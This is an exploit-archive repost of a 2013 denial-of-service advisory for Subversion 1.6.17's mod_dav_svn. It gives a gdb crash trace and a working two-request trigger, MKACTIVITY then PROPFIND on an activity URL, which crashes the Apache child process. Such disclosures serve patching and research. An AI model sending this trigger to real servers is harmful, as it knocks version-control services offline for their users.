首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Subversion 1.6.17 Denial Of Service
来源:vfocus.net 作者:AKAT-1 发布时间:2013-03-08  
#########################
# Subversion MKACTIVITY #
#########################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

# libsvn_fs's svn_fs_file_length() fun
# tested on 1.6.17 and few others

(gdb) where
#0  0x00007f2595db9d60 in svn_fs_file_length () from /usr/lib/x86_64-linux-gnu/libsvn_fs-1.so.1
#1  0x00007f25961f2d8b in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#2  0x00007f25961f37c5 in dav_svn__insert_all_liveprops () from /usr/lib/apache2/modules/mod_dav_svn.so
#3  0x00007f259682b37a in dav_run_insert_all_liveprops (r=0x7f2590df10a0, resource=0x7fff6e97e1a8, what=DAV_PROP_INSERT_VALUE, phdr=0x7fff6e97dff0) at mod_dav.c:4889
#4  0x00007f259682bc55 in dav_get_allprops (propdb=0x7f258d0db3d0, what=DAV_PROP_INSERT_VALUE) at props.c:655
#5  0x00007f2596824f5e in dav_propfind_walker (wres=0x7fff6e97e188, calltype=<optimized out>) at mod_dav.c:1949
#6  0x00007f25961fc6d1 in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#7  0x00007f25961fcb6d in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#8  0x00007f2596829bda in dav_method_propfind (r=0x7f2590df10a0) at mod_dav.c:2081
#9  dav_handler (r=0x7f2590df10a0) at mod_dav.c:4681
#10 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4587
#11 0x00007f259e568b50 in ap_run_handler (r=0x7f2590df10a0) at config.c:159
#12 0x00007f259e568f9b in ap_invoke_handler (r=r@entry=0x7f2590df10a0) at config.c:377
#13 0x00007f259e579078 in ap_process_request (r=r@entry=0x7f2590df10a0) at http_request.c:282
#14 0x00007f259e575f38 in ap_process_http_connection (c=0x7f25917c0290) at http_core.c:190
#15 0x00007f259e56f510 in ap_run_process_connection (c=0x7f25917c0290) at connection.c:43
#16 0x00007f259e56f8f8 in ap_process_connection (c=c@entry=0x7f25917c0290, csd=<optimized out>) at connection.c:190
#17 0x00007f259e57dc2e in child_main (child_num_arg=child_num_arg@entry=6) at prefork.c:667
#18 0x00007f259e57e382 in make_child (slot=6, s=0x7f259e4d6818) at prefork.c:768
#19 make_child (s=0x7f259e4d6818, slot=6) at prefork.c:696
#20 0x00007f259e57eee6 in perform_idle_server_maintenance (p=<optimized out>) at prefork.c:903
#21 ap_mpm_run (_pconf=_pconf@entry=0x7f259e515028, plog=<optimized out>, s=s@entry=0x7f259e4d6818) at prefork.c:1107
#22 0x00007f259e553826 in main (argc=3, argv=0x7fff6e97e9b8) at main.c:755
(gdb)
(gdb) i r
rax            0x7fff6e97e1e0   140735048835552
rbx            0x7fff6e97e1a8   140735048835496
rcx            0x7f2590df7028   139799321079848
rdx            0x0      0
rsi            0x0      0
rdi            0x7fff6e97dec8   140735048834760
rbp            0x3      0x3
rsp            0x7fff6e97de78   0x7fff6e97de78
r8             0x7f2596833ee0   139799415701216
r9             0x1      1
r10            0x1      1
r11            0x1      1
r12            0x4e24   20004
r13            0x7f2590e08028   139799321149480
r14            0x7fff6e97dff0   140735048835056
r15            0x7f2590df7028   139799321079848
rip            0x7f2595db9d60   0x7f2595db9d60 <svn_fs_file_length>
eflags         0x246    [ PF ZF IF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) x/i $rip
=> 0x7f2595db9d60 <svn_fs_file_length>: mov    0x30(%rsi),%rax
(gdb) x/x $rsi
0x0:    Cannot access memory at address 0x0


Basically it requires >= 2 requests to crash apache child process (in mod_dav_svn / libsvn_fs).
-- cut --
1. MKACTIVITY /egg/!svn/act/foo HTTP/1.1
2. PROPFIND /egg/!svn/act/foo HTTP/1.1 (sigsegv)
-- cut --
EOF

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Raspberry Pi rpi-update Local
·SIP Witch 0.7.4 Denial Of Serv
·Viscosity setuid-set Viscosity
·Samsung TV Denial Of Service
·Setuid Tunnelblick Privilege E
·Varnish 2.1.5 / 3.0.3 Denial O
·Sami FTP Server 2.0.1 LIST Com
·Squid 3.x Denial Of Service
·Hanso Player 2.1.0 (.m3u) - Bu
·ALLMediaServer 0.94 SEH Overfl
·Ruby Gem ftpd-0.2.1 Remote Com
·Firebird Relational Database C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved